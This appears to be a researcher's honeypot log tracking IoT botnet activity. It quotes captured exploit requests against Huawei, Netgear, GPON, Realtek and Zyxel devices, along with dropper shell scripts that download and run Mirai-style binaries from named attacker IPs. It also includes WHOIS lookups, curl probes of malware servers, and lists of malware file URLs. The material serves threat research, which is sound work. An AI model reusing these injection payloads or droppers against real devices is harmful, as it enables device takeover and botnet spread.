<?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 109.206.241.129 666bins/666awei -r /fuckyou/xd.mips;chmod -x huawei;/tmp/huawei huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
GET /setup.cgi?next_file=netgear.cfg&todo=syscmd&cmd=rm+-rf+/tmp/*;wget+http://109.206.241.129/666bins/666.mips+-O+/tmp/netgear;sh+netgear&curpath=/¤tsetting.htm=1 HTTP/1.0
POST /picsdesc.xml HTTP/1.1
Host: %s:52869
Content-Length: 630
Accept-Encoding: gzip, deflate
SOAPAction: urn:schemas-upnp-org:service:WANIPConnection:1#AddPortMapping
Accept: */*
User-Agent: Hello, World
Connection: keep-alive
<?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:AddPortMapping xmlns:u="urn:schemas-upnp-org:service:WANIPConnection:1"><NewRemoteHost></NewRemoteHost><NewExternalPort>47500</NewExternalPort><NewProtocol>TCP</NewProtocol><NewInternalPort>44382</NewInternalPort><NewInternalClient>`cd /tmp/; rm -rf*; wget http://109.206.241.129/666bins/666.mips`</NewInternalClient><NewEnabled>1</NewEnabled><NewPortMappingDescription>syncthing</NewPortMappingDescription><NewLeaseDuration>0</NewLeaseDuration></u:AddPortMapping></s:Body></s:Envelope>
POST /picsdesc.xml HTTP/1.1
Host: %s:52869
Content-Length: 630
Accept-Encoding: gzip, deflate
SOAPAction: urn:schemas-upnp-org:service:WANIPConnection:1#AddPortMapping
Accept: */*
User-Agent: Hello, World
Connection: keep-alive
<?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:AddPortMapping xmlns:u="urn:schemas-upnp-org:service:WANIPConnection:1"><NewRemoteHost></NewRemoteHost><NewExternalPort>47500</NewExternalPort><NewProtocol>TCP</NewProtocol><NewInternalPort>44382</NewInternalPort><NewInternalClient>`cd /tmp/;chmod +x xd.mips;./xd.mips realtek`</NewInternalClient><NewEnabled>1</NewEnabled><NewPortMappingDescription>syncthing</NewPortMappingDescription><NewLeaseDuration>0</NewLeaseDuration></u:AddPortMapping></s:Body></s:Envelope>
POST /GponForm/diag_Form?images/ HTTP/1.1
Host: 127.0.0.1:80
Connection: keep-alive
Accept-Encoding: gzip, deflate
Accept: */*
User-Agent: Hello, World
Content-Length: 118
XWebPageName=diag&diag_action=ping&wan_conlist=0&dest_host=``;wget+http://109.206.241.129/666bins/666.mips+-O+->/tmp/gpon80;sh+/tmp/gpon80+gpon80mips&ipv=0
POST /GponForm/diag_Form?images/ HTTP/1.1
Host: 127.0.0.1:8080
Connection: keep-alive
Accept-Encoding: gzip, deflate
Accept: */*
User-Agent: Hello, World
Content-Length: 118
XWebPageName=diag&diag_action=ping&wan_conlist=0&dest_host=``;wget+http://109.206.241.129/666bins/666.mips+-O+->/tmp/gpon8080;sh+/tmp/gpon8080&+gponmipsipv=0
%d.%d.%d.%d
POST /GponForm/diag_Form?style/ HTTP/1.1
User-Agent: Hello, World
Accept: */*
Accept-Encoding: gzip, deflate
Content-Type: application/x-www-form-urlencoded
XWebPageName=diag&diag_action=ping&wan_conlist=0&dest_host=`busybox+wget+http://109.206.241.129/666.sh+-O+/tmp/gaf;sh+/tmp/gaf`&ipv=0
POST /ctrlt/DeviceUpgrade_1 HTTP/1.1
Content-Length: 430
Connection: keep-alive
Accept: */*
Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
<?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 109.206.241.129 -l /tmp/.hiroshima -r /666bins/666.mips; /bin/busybox chmod 777 * /tmp/.hiroshima; /tmp/.hiroshima huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
GET /shell?cd+/tmp;rm+-rf+*;wget+109.206.241.129/666.sh;sh+/tmp/666.sh HTTP/1.1
User-Agent: Hello, world
Host: 127.0.0.1:80
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Connection: keep-alive
/proc/net/tcp
109.206.241.129
GET /setup.cgi?next_file=netgear.cfg&todo=syscmd&cmd=wget%20http://79.110.62.227/fuckyou/xd.mips%20-O%20/var/tmp/xd.mips;%20chmod%20777%20/var/tmp/xd.mips;%20/var/tmp/xd.mips%20Netgear.mips;%20rm%20-rf%20/var/tmp/xd.mips&curpath=/¤tsetting.htm=1
abcdefghijklmnopqrstuvw012345678
POST /cgi-bin/ViewLog.asp HTTP/1.1
Host: 127.0.0.1
Connection: keep-alive
Accept-Encoding: gzip, deflate
Accept: */*
User-Agent: Hello, world
Content-Length: 176
Content-Type: application/x-www-form-urlencoded
remote_submit_Flag=1&remote_syslog_Flag=1&RemoteSyslogSupported=1&LogFlag=0&remote_host=%3bcd+/tmp;wget+http://109.206.241.129/666bins/666.arm7;chmod+777+666.arm7;./666.arm7+zyxel;rm+-rf+arm7%3b%23&remoteSubmit=Save
inetnum: 185.132.53.0 - 185.132.53.255
org: ORG-FA1229-RIPE
netname: Fly-Hosting
country: RU
admin-c: JA9548-RIPE
tech-c: JA9548-RIPE
status: SUB-ALLOCATED PA
mnt-by: FLY-HOSTING-MNT
created: 2022-10-21T14:23:18Z
last-modified: 2022-10-31T16:07:58Z
source: RIPE
organisation: ORG-FA1229-RIPE
org-name: Fly-Hosting
org-type: OTHER
address: Alte Heerstra�e 13
address: 38518 Gifhorn
abuse-c: ACRO47362-RIPE
mnt-ref: FLY-HOSTING-MNT
mnt-by: FLY-HOSTING-MNT
created: 2022-10-22T15:18:07Z
last-modified: 2022-10-28T05:41:01Z
source: RIPE # Filtered
$ curl -i http://185.132.53.105
HTTP/1.1 200 OK
Date: Wed, 02 Nov 2022 06:48:55 GMT
Server: Apache/2.4.29 (Ubuntu)
Last-Modified: Sun, 30 Oct 2022 14:34:42 GMT
ETag: "15-5ec4164386480"
Accept-Ranges: bytes
Content-Length: 21
Content-Type: text/html
rickrolledyoubitchies
inetnum: 115.48.0.0 - 115.63.255.255
netname: UNICOM-HA
descr: China Unicom Henan province network
descr: China Unicom
country: CN
admin-c: CH1302-AP
tech-c: WW444-AP
remarks: service provider
mnt-by: APNIC-HM
mnt-lower: MAINT-CNCGROUP-HA
mnt-routes: MAINT-CNCGROUP-RR
remarks: --------------------------------------------------------
remarks: To report network abuse, please contact mnt-irt
remarks: For troubleshooting, please contact tech-c and admin-c
remarks: Report invalid contact via www.apnic.net/invalidcontact
remarks: --------------------------------------------------------
mnt-irt: IRT-CU-CN
status: ALLOCATED PORTABLE
last-modified: 2016-05-04T00:13:27Z
source: APNIC
irt: IRT-CU-CN
address: No.21,Financial Street
address: Beijing,100033
address: P.R.China
e-mail: hqs-ipabuse@chinaunicom.cn
abuse-mailbox: hqs-ipabuse@chinaunicom.cn
admin-c: CH1302-AP
tech-c: CH1302-AP
auth: # Filtered
mnt-by: MAINT-CNCGROUP
last-modified: 2017-10-23T05:59:13Z
source: APNIC
$ curl -i http://115.61.118.35:58226
HTTP/1.1 200 OK
Server: nginx
Content-Length: 307960
Connection: close
Content-Type: application/zip
$ curl -i http://115.61.118.35:58226/Mozi.a
HTTP/1.1 200 OK
Server: nginx
Content-Length: 307960
Connection: close
Content-Type: application/zip
inetnum: 185.132.53.0 - 185.132.53.255
org: ORG-FA1229-RIPE
netname: Fly-Hosting
country: DE
admin-c: JA9548-RIPE
tech-c: JA9548-RIPE
status: SUB-ALLOCATED PA
mnt-by: FLY-HOSTING-MNT
created: 2022-10-21T14:23:18Z
last-modified: 2022-11-07T22:54:42Z
source: RIPE
organisation: ORG-FA1229-RIPE
org-name: Fly-Hosting
org-type: OTHER
address: Alte Heerstra�e 13
address: 38518 Gifhorn
abuse-c: ACRO47362-RIPE
mnt-ref: FLY-HOSTING-MNT
mnt-by: FLY-HOSTING-MNT
created: 2022-10-22T15:18:07Z
last-modified: 2022-10-28T05:41:01Z
source: RIPE # Filtered
Interesting to note that last WHOIS record from a few weeks ago above, the WHOIS record stated “RU” as a country code, not “DE”.
$ curl -i http://185.132.53.105/
HTTP/1.1 200 OK
Date: Fri, 11 Nov 2022 18:42:09 GMT
Server: Apache/2.4.29 (Ubuntu)
Last-Modified: Sun, 30 Oct 2022 14:34:42 GMT
ETag: "15-5ec4164386480"
Accept-Ranges: bytes
Content-Length: 21
Content-Type: text/html
rickrolledyoubitchies
Index of /xplt
[ICO] Name Last modified Size Description
══════════════════════════════════════════════════════════════
[PARENTDIR] Parent Directory -
[TXT] adsl.sh 2022-11-03 08:52 242
[ ] dvr 2022-10-30 15:16 99K
[TXT] ip.sh 2022-11-08 01:17 247
[TXT] lv.sh 2022-11-08 08:01 233
[ ] mrtlk 2022-10-30 15:16 100K
[ ] mrtm7 2022-10-30 15:16 102K
[ ] mrtmps 2022-10-30 15:16 99K
[ ] mrtmpsk 2022-10-30 15:16 99K
[ ] mrtmpsl 2022-10-30 15:16 100K
[ ] mtmr5 2022-10-30 15:16 78K
[ ] mtmr5v2 2022-10-30 15:16 78K
[ ] think 2022-11-04 16:55 0
[ ] thinks 2022-11-04 16:55 0
[ ] xtld 2022-11-04 16:55 0
══════════════════════════════════════════════════════════════
Apache/2.4.29 (Ubuntu) Server at 185.132.53.105 Port 80
cd /data/local/tmp; busybox wget http://45.95.55.214/adb/adb.sh -O -> vzwxz; chmod 777 vzwxz; sh vzwxz; curl -O http://45.95.55.21/adb/adb.sh; cat wget.sh > adb; chmod 777 adb; sh adb; rm -rf vzwxz adb
Shell files (adsl.sh
, ip.sh
, lv.sh
):
#!/bin/sh
u=".zbns"
bin_names="mips mipsel"
http_server="185.132.53.105"
for name in $bin_names
do
rm -rf $u
cp $SHELL $u
chmod 777 $u
>$u
wget http://$http_server/multi/l.$name -O -> $u
./$u wget.ADSL.$name
done
#!/bin/sh
u=".zbns"
bin_names="mips mipsel"
http_server="185.132.53.105"
for name in $bin_names
do
rm -rf $u
cp $SHELL $u
chmod 777 $u
>$u
wget http://$http_server/multi/l.$name -O -> $u
./$u Selfrep.Dahura.$name
done
#!/bin/sh
u=".zbns"
bin_names="x86_64"
http_server="185.132.53.105"
for name in $bin_names
do
rm -rf $u
cp $SHELL $u
chmod 777 $u
>$u
wget http://$http_server/multi/l.$name -O -> $u
./$u Cisco.$name
done
Files exist and are downloadable, but:
$ curl -i http://185.132.53.105/multi/
HTTP/1.1 200 OK
Date: Fri, 11 Nov 2022 18:48:19 GMT
Server: Apache/2.4.29 (Ubuntu)
Last-Modified: Sun, 30 Oct 2022 14:34:42 GMT
ETag: "15-5ec4164386480"
Accept-Ranges: bytes
Content-Length: 21
Content-Type: text/html
rickrolledyoubitchies
No directory listing. Some standard Mirai architectures were found, however.
amkbins.duckdns.org. 29 IN A 179.43.141.105
$ whois amkbins.duckdns.org
[Querying whois.pir.org]
[whois.pir.org]
Malformed request.
inetnum: 179.43.128.0/18
status: allocated
aut-num: N/A
owner: PRIVATE LAYER INC
ownerid: PA-PLIN-LACNIC
responsible: Milciades Garcia
address: Torres De Las Americas, Torre C, 0, Suite 1404, Floor 14
address: 00000 - Panama -
country: PA
phone: +41 43 5082295
owner-c: MIG23
tech-c: MIG23
abuse-c: MIG23
inetrev: 179.43.128.0/24
nserver: DNS01.PRIVATELAYER.COM
nsstat: 20221124 AA
nslastaa: 20221124
nserver: DNS02.PRIVATELAYER.COM
nsstat: 20221124 AA
nslastaa: 20221124
$ cat dlink | grep -oE "wget http[^;]+;" | cut -d ';' -f1 | cut -d ' ' -f2 | sort | uniq
http://amkbins.duckdns.org/bins/ascaris.arc
http://amkbins.duckdns.org/bins/ascaris.arm
http://amkbins.duckdns.org/bins/ascaris.arm5
http://amkbins.duckdns.org/bins/ascaris.arm6
http://amkbins.duckdns.org/bins/ascaris.arm7
http://amkbins.duckdns.org/bins/ascaris.i486
http://amkbins.duckdns.org/bins/ascaris.i686
http://amkbins.duckdns.org/bins/ascaris.m68k
http://amkbins.duckdns.org/bins/ascaris.mips
http://amkbins.duckdns.org/bins/ascaris.mpsl
http://amkbins.duckdns.org/bins/ascaris.ppc
http://amkbins.duckdns.org/bins/ascaris.sh4
http://amkbins.duckdns.org/bins/ascaris.spc
http://amkbins.duckdns.org/bins/ascaris.x86
http://amkbins.duckdns.org/bins/ascaris.x86_64
$ curl -i http://amkbins.duckdns.org/
HTTP/1.1 200 OK
Date: Fri, 25 Nov 2022 20:14:58 GMT
Server: Apache/2.4.6 (CentOS)
Last-Modified: Tue, 25 Oct 2022 18:25:12 GMT
ETag: "0-5ebe0075d4763"
Accept-Ranges: bytes
Content-Length: 0
Content-Type: text/html; charset=UTF-8
$ curl -i http://amkbins.duckdns.org/bins/
HTTP/1.1 200 OK
Date: Fri, 25 Nov 2022 20:16:53 GMT
Server: Apache/2.4.6 (CentOS)
Last-Modified: Tue, 25 Oct 2022 18:25:12 GMT
ETag: "0-5ebe0075d4b4b"
Accept-Ranges: bytes
Content-Length: 0
Content-Type: text/html; charset=UTF-8
inetnum: 43.251.16.0 - 43.251.17.255
netname: HVISCL-HK
descr: HongKong Virtual Internal Server Company Limited
descr: UnitE15, 3/F., Wing Tat Commercial Building,
descr: 97 Bonham Strand East,
descr: Sheung Wan,
country: HK
geoloc: 22.335066 114.19588
org: ORG-HVIS1-AP
admin-c: TR233-AP
tech-c: TR233-AP
abuse-c: AH1080-AP
status: ALLOCATED PORTABLE
mnt-by: APNIC-HM
mnt-lower: MAINT-HVISCL-HK
mnt-routes: MAINT-HVISCL-HK
mnt-irt: IRT-HVISCL-HK
last-modified: 2020-08-12T13:03:50Z
source: APNIC
irt: IRT-HVISCL-HK
address: UnitE15, 3/F., Wing Tat Commer, Hong Kong
e-mail: TimothyRottly@hlvps.net
abuse-mailbox: TimothyRottly@hlvps.net
admin-c: HVIS1-AP
tech-c: HVIS1-AP
auth: # Filtered
remarks: timothyrottly@hlvps.net was validated on 2022-10-05
mnt-by: MAINT-HVISCL-HK
last-modified: 2022-10-05T17:13:34Z
source: APNIC
$ curl -i http://43.251.17.160/
HTTP/1.1 200 OK
Content-Type: text/html; charset=utf-8
Content-Length: 7757
Accept-Ranges: bytes
Server: HFS 2.4.0 RC7
Set-Cookie: HFS_SID_=2tIG2d7t5UAAAAB933O8Pw; path=/; HttpOnly
Cache-Control: no-cache, no-store, must-revalidate, max-age=-1
HTTP File Server
Login Search Selection Toggle timestamp Sort
Search _____________________
(X) this folder and sub-folders
( ) this folder only
( ) entire server Go Clear
Uploaded: 0 - Failed: 0 - Queued: 0
Uploading...
Reload page
0 selected Mask Invert Delete Move Archive
0 folders, 4 files, 2.0 MB
[IMG] server.exe
2022-12-11 23:13 369.5 KB
[IMG] svchost.exe
2022-12-11 23:16 241.1 KB
[IMG] svchst.exe
2022-12-11 15:50 194.5 KB
[IMG] syn
2022-12-2 22:17 1.2 MB
Uptime: (7 days) 02:21:01
$ file *
server.exe: PE32 executable (GUI) Intel 80386, for MS Windows
svchost.exe: PE32 executable (GUI) Intel 80386, for MS Windows
svchst.exe: PE32 executable (GUI) Intel 80386, for MS Windows, UPX compressed
syn: ELF 32-bit LSB executable, Intel 80386, version 1 (SYSV), statically linked, for GNU/Linux 2.2.5, not stripped
syn
has a lot of IPs in it, many are DNS or internal, many are not (likely attack IPs):
$ strings syn | grep -E "^[0-9]+\.[0-9]+\.[0-9]+\.[0-9]+$"
127.0.0.1
8.8.8.8
8.8.4.4
8.8.8.8
127.0.0.1
61.132.163.68
202.102.192.68
202.102.213.68
202.102.200.101
58.242.2.2
202.38.64.1
211.91.88.129
211.138.180.2
218.104.78.2
202.102.199.68
202.175.3.3
202.175.3.8
202.112.144.30
61.233.9.9
61.233.9.61
124.207.160.110
202.97.7.6
202.97.7.17
202.106.0.20
202.106.46.151
202.106.195.68
202.106.196.115
202.106.196.212
202.106.196.228
202.106.196.230
202.106.196.232
202.106.196.237
202.112.112.10
211.136.17.107
211.136.28.231
211.136.28.234
211.136.28.237
211.147.6.3
219.141.136.10
219.141.140.10
219.141.148.37
219.141.148.39
219.239.26.42
221.130.32.100
221.130.32.103
221.130.32.106
221.130.32.109
221.130.33.52
221.130.33.60
221.176.3.70
221.176.3.73
221.176.3.76
221.176.3.79
221.176.3.83
221.176.3.85
221.176.4.6
221.176.4.9
221.176.4.12
221.176.4.15
221.176.4.18
221.176.4.21
58.22.96.66
218.104.128.106
202.101.98.55
211.138.145.194
211.138.151.161
211.138.156.66
218.85.152.99
218.85.157.99
222.47.29.93
202.101.107.85
119.233.255.228
222.47.62.142
122.72.33.240
211.98.121.27
218.203.160.194
221.7.34.10
61.235.70.98
113.111.211.22
202.96.128.68
202.96.128.86
202.96.128.166
210.21.3.140
210.21.4.130
211.95.193.97
211.98.2.4
211.98.4.1
211.162.61.225
211.162.61.235
211.162.61.255
211.162.62.1
211.162.62.60
221.4.66.66
202.103.176.22
202.96.144.47
210.38.192.33
202.96.134.33
202.96.134.133
202.96.154.15
210.21.196.6
221.5.88.88
202.103.243.112
202.193.64.33
61.235.164.13
61.235.164.18
202.103.225.68
221.7.136.68
202.103.224.68
211.97.64.129
211.138.240.100
211.138.242.18
211.138.245.180
221.7.128.68
222.52.118.162
202.98.192.67
202.98.198.167
211.92.136.81
211.139.1.3
211.139.2.18
202.100.192.68
211.97.96.65
211.138.164.6
221.11.132.2
202.100.199.8
202.99.160.68
202.99.166.4
202.99.168.8
222.222.222.222
202.102.224.68
202.102.227.68
222.85.85.85
222.88.88.88
210.42.241.1
202.196.64.1
112.100.100.100
202.97.224.68
219.235.127.1
61.236.93.33
211.93.24.129
211.137.241.34
219.147.198.230
202.103.0.68
202.103.0.117
202.103.24.68
202.103.44.150
202.114.0.242
202.114.240.6
211.161.158.11
211.161.159.3
218.104.111.114
218.104.111.122
218.106.127.114
218.106.127.122
221.232.129.30
59.51.78.210
61.234.254.5
202.103.96.112
219.72.225.253
222.243.129.81
222.246.129.80
211.142.210.98
211.142.210.100
220.168.208.3
220.168.208.6
220.170.64.68
218.76.192.100
61.187.98.3
61.187.98.6
202.98.0.68
211.93.64.129
211.141.16.99
202.98.5.68
219.149.194.55
211.138.200.69
202.102.3.141
202.102.3.144
58.240.57.33
112.4.0.55
114.114.114.114
114.114.115.115
202.102.24.34
218.2.135.1
221.6.4.66
221.131.143.69
202.102.8.141
222.45.0.110
61.177.7.1
218.104.32.106
211.103.13.101
221.228.255.1
61.147.37.1
222.45.1.40
58.241.208.46
202.102.9.141
202.102.7.90
202.101.224.68
202.101.226.68
211.141.90.68
211.137.32.178
202.96.69.38
211.140.197.58
219.149.6.99
202.96.86.18
101.47.189.10
101.47.189.18
118.29.249.50
118.29.249.54
202.96.64.68
202.96.75.68
202.118.1.29
202.118.1.53
219.148.204.66
202.99.224.8
202.99.224.67
211.90.72.65
211.138.91.1
218.203.101.3
202.100.96.68
211.93.0.81
222.75.152.129
211.138.75.123
202.102.154.3
202.102.152.3
219.146.1.66
219.147.1.66
202.102.128.68
202.102.134.68
211.138.106.19
211.90.80.65
202.99.192.66
202.99.192.68
61.134.1.4
202.117.96.5
202.117.96.10
218.30.19.40
218.30.19.50
116.228.111.118
180.168.255.18
202.96.209.5
202.96.209.133
202.101.6.2
211.95.1.97
211.95.72.1
211.136.112.50
211.136.150.66
119.6.6.6
124.161.97.234
124.161.97.238
124.161.97.242
61.139.2.69
202.98.96.68
202.115.32.36
202.115.32.39
218.6.200.139
218.89.0.124
61.139.54.66
61.139.39.73
139.175.10.20
139.175.55.244
139.175.150.20
139.175.252.16
168.95.1.1
210.200.211.193
210.200.211.225
211.78.130.1
61.31.1.1
61.31.233.1
168.95.192.1
168.95.192.174
61.60.224.3
61.60.224.5
202.113.16.10
202.113.16.11
202.99.96.68
202.99.104.68
211.137.160.5
211.137.160.185
219.150.32.132
202.98.224.68
211.139.73.34
61.10.0.130
61.10.1.130
202.14.67.4
202.14.67.14
202.45.84.58
202.45.84.67
202.60.252.8
202.85.128.32
203.80.96.9
203.142.100.18
203.142.100.21
203.186.94.20
203.186.94.241
221.7.1.20
61.128.114.133
61.128.114.166
218.202.152.130
61.166.150.123
202.203.128.33
211.98.72.7
211.139.29.68
211.139.29.150
211.139.29.170
221.3.131.11
222.172.200.68
61.166.150.101
61.166.150.139
202.203.144.33
202.203.160.33
202.203.192.33
202.203.208.33
202.203.224.33
211.92.144.161
222.221.5.240
61.166.25.129
202.96.103.36
221.12.1.227
221.130.252.200
222.46.120.5
202.96.96.68
218.108.248.219
218.108.248.245
61.130.254.34
60.191.244.5
202.96.104.15
202.96.104.26
221.12.33.227
202.96.107.27
61.128.128.68
61.128.192.68
218.201.17.2
221.5.203.86
221.5.203.90
221.5.203.98
221.7.92.86
221.7.92.98
1.0.0.0
1.0.0.1
255.0.0.0
254.255.255.254
127.0.0.1
127.0.0.1
10.0.0.0
10.255.255.255
127.0.0.0
127.255.255.255
172.16.0.0
172.31.255.255
192.168.0.0
192.168.255.255
255.0.0.0
254.255.255.254
heylitimysun.top. 205 IN A 209.141.51.132
NetRange: 209.141.32.0 - 209.141.63.255
CIDR: 209.141.32.0/19
NetName: PONYNET-04
NetHandle: NET-209-141-32-0-1
Parent: NET209 (NET-209-0-0-0-0)
NetType: Direct Allocation
OriginAS: AS53667
Organization: FranTech Solutions (SYNDI-5)
RegDate: 2011-01-27
Updated: 2012-03-25
Ref: https://rdap.arin.net/registry/ip/209.141.32.0
OrgName: FranTech Solutions
OrgId: SYNDI-5
Address: 1621 Central Ave
City: Cheyenne
StateProv: WY
PostalCode: 82001
Country: US
RegDate: 2010-07-21
Updated: 2017-01-28
Ref: https://rdap.arin.net/registry/entity/SYNDI-5
$ curl -i http://heylitimysun.top
HTTP/1.1 200 OK
Date: Wed, 28 Dec 2022 18:09:02 GMT
Server: Apache/2.4.6 (CentOS)
Last-Modified: Sun, 25 Dec 2022 03:09:09 GMT
ETag: "0-5f09e57a6bc1e"
Accept-Ranges: bytes
Content-Length: 0
Content-Type: text/html; charset=UTF-8
$ curl -i http://heylitimysun.top/xmogu/
HTTP/1.1 200 OK
Date: Wed, 28 Dec 2022 18:10:46 GMT
Server: Apache/2.4.6 (CentOS)
Last-Modified: Sun, 25 Dec 2022 03:09:09 GMT
ETag: "0-5f09e57a6c006"
Accept-Ranges: bytes
Content-Length: 0
Content-Type: text/html; charset=UTF-8
$ curl -i http://209.141.51.132/xmogu/
HTTP/1.1 200 OK
Date: Wed, 28 Dec 2022 18:10:54 GMT
Server: Apache/2.4.6 (CentOS)
Last-Modified: Sun, 25 Dec 2022 03:09:09 GMT
ETag: "0-5f09e57a6c006"
Accept-Ranges: bytes
Content-Length: 0
Content-Type: text/html; charset=UTF-8
From a Cowrie session.
Should I report it? Nah, I’ve reported things to Discord in the past and they just ignore it or apologize for “being exposed to such behavior” and then don’t remove the offending material. They’ll be prosecuted eventually for this. Then just pay whatever fine and continue supporting Russian attacks on western infrastructure.
They do this for ban evasions that they themselves perform, too, which runs them afoul of Section 230 of the CDA as they can’t enforce their own rules. Discord doesn’t have much time left in the world unless they get their company together.
https://cdn.discordapp.com/attachments/1003424872409600060/1004530310878347284/ninfo
#!/bin/bash
BLK='[1;30m'
RED='[1;31m'
GRN='[1;32m'
YEL='[1;33m'
DBLU='[1;34m'
MAG='[1;35m'
CYN='[1;36m'
WHI='[1;37m'
DRED='[0;31m'
DGRN='[0;32m'
DYEL='[0;33m'
DBLU='[0;34m'
DMAG='[0;35m'
DCYN='[0;36m'
DWHI='[0;37m'
RES='[0m'
CPU=$(grep -m 1 "model name" /proc/cpuinfo | cut -d: -f2 | sed -e 's/^ *//' | sed -e 's/$//')
CPUS=$(grep -c ^processor /proc/cpuinfo)
STEP=$(grep -m 1 "stepping" /proc/cpuinfo | cut -d: -f2 | sed -e 's/^ *//' | sed -e 's/$//')
BOGO=$(grep -m 1 "bogomips" /proc/cpuinfo | cut -d: -f2 | sed -e 's/^ //' | sed -e 's/$//')
OS=$(lsb_release -si)
ram=$(free -m | grep -oP '\d+' | head -n 1)
VER=$(uname -a )
uptime=$(</proc/uptime)
uptime=${uptime%%.} bold=$(tput bold)
zile=$(( uptime/60/60/24 ))
secunde=$(( uptime%60 ))
minute=$(( uptime/60%60 ))
ore=$(( uptime/60/60%24 ))
vid=$(lspci | grep VGA | cut -f5- -d ' ')
DISK=$(df -h –total | grep total |awk '{ printf "" $2 "B\n\n" }')
sleep 1
echo "${DRED}–––––––––––––––––––––––––––––––––––––${WHI}"
echo "${WHI}| ${WHI} NasaPaul.com Official Website |${WHI}"
echo "${DRED}–––––––––––––––––––––––––––––––––––––${WHI}"
sleep 1
echo "${DRED} ->${WHI} Loading Resurces… ${DGRN} 34% ${WHI}"
echo "${DRED} ->${WHI} Loading Resurces… ${DGRN} 68% ${WHI}"
echo "${DRED} ->${WHI} Loading Resurces… ${DGRN} 100%${WHI}"
echo ""
echo ""
echo "${DRED} ->${WHI} Resource Loaded… ${DGRN} 100%${WHI}"
echo ""
sleep 2
echo "${WHI}# ${DRED}CPU ${DRED} -> ${WHI}${CPU}${RES}" #${WHI}"
echo "${WHI}# ${DRED}CPU CORE ${DRED} -> ${WHI}${CPUS}${RES}" #${WHI}"
echo "${WHI}# ${DRED}Stepping ${DRED} -> ${WHI}${STEP}${RES}" #${WHI}"
echo "${WHI}# ${DRED}Bogomips ${DRED} -> ${WHI}${BOGO}${RES}" #${WHI}"
echo "${WHI}# ${DRED}Ram ${DRED} -> ${WHI}${ram}MB [1024MB = 1GB]" #${WHI}"
echo "${WHI}# ${DRED}GPU ${DRED} -> ${WHI}${vid}"
echo "${WHI}# ${DRED}DISK SPACE ${DRED} -> ${WHI}${DISK}"
echo "${WHI}# ${DRED}Versiune ${DRED} -> ${WHI}${VER}"
echo "${WHI}# ${DRED}Uptime ${DRED} -> ${WHI}${zile} Zile"
sleep 2
if ((${EUID:-0} || "$(id -u)")); then
echo "${WHI}#${DRED} Drept de root -> ${WHI}Nu ai""${WHI} ${WHI}"
sleep 3
else
echo "${WHI}# ${DRED}Drept de root -> ${WHI}Ai ${WHI}"
fi
sleep 3
echo "${DRED}–––––––––––––––––––––––––––––––––––––${WHI}"
echo "${WHI}| ${WHI}SPEED TESTUL INCEPE IN 3 SECUNDE |${WHI}"
echo "${DRED}–––––––––––––––––––––––––––––––––––––${WHI}"
sleep 1
echo "${DRED} ->${WHI}1${WHI}"
sleep 1
echo "${DRED} ->${WHI}2${WHI}"
sleep 1
echo "${DRED} ->${WHI}3${WHI}"
sleep 1
wget nasapaul.com/v.py
perl v.py
malware_df[order(malware_df$File.Name) ,c("File.Name", "ClamAV")]
## File.Name
## 1055 1.246.222.228/2200/Mozi.m
## 455 103.200.31.97/~img0
## 888 103.200.31.97/~img10
## 47 103.200.31.97/~img15
## 890 103.200.31.97/~img18
## 366 103.200.31.97/~img27
## 927 103.200.31.97/~img3
## 732 103.200.31.97/~img42
## 970 103.200.31.97/~img43
## 162 103.200.31.97/~img45
## 1021 103.200.31.97/~img8
## 1154 103.200.31.97/favicon.ico
## 496 103.200.31.97/gfdsg
## 383 103.200.31.97/hyhjkyt
## 45 103.200.31.97/index.html
## 1060 103.200.31.97/index.html?mode=jquery
## 591 103.200.31.97/index.html?mode=section&id=lib.js
## 1174 103.200.31.97/index.html?mode=section&id=style.css
## 870 103.200.31.97/libcef.exe
## 330 103.200.31.97/SkinH.dll
## 254 106.246.224.219/img2.gif
## 113 106.246.224.219/img3.gif
## 902 106.246.224.219/img4.gif
## 127 106.246.224.219/img5.gif
## 886 106.246.224.219/img9.gif
## 665 106.246.224.219/index.html
## 320 106.246.224.219/pty1
## 949 106.246.224.219/pty10
## 652 106.246.224.219/pty2
## 534 106.246.224.219/pty3
## 92 106.246.224.219/pty4
## 170 106.246.224.219/pty5
## 294 106.246.224.219/pty6
## 812 106.246.224.219/pty7
## 239 106.246.224.219/russia.sh
## 395 107.174.137.24/garm
## 335 107.174.137.24/garm5
## 88 107.174.137.24/garm6
## 1099 107.174.137.24/garm7
## 1089 107.174.137.24/gm68k
## 385 107.174.137.24/gmips
## 1173 107.174.137.24/gmpsl
## 420 107.174.137.24/gppc
## 188 107.174.137.24/gsh4
## 611 107.174.137.24/gspc
## 266 107.174.137.24/gx86
## 1119 107.175.215.224/garm
## 1064 107.175.215.224/garm5
## 751 107.175.215.224/garm6
## 296 107.175.215.224/garm7
## 202 107.175.215.224/gm68k
## 215 107.175.215.224/gmips
## 60 107.175.215.224/gmpsl
## 790 107.175.215.224/gppc
## 297 107.175.215.224/gsh4
## 161 107.175.215.224/gspc
## 593 107.175.215.224/gx86
## 1150 107.182.129.226/a/arm
## 620 107.182.129.226/a/arm5
## 513 107.182.129.226/a/arm6
## 234 107.182.129.226/a/arm7
## 466 107.182.129.226/a/m68k
## 456 107.182.129.226/a/mips
## 439 107.182.129.226/a/mpsl
## 1066 107.182.129.226/a/ppc
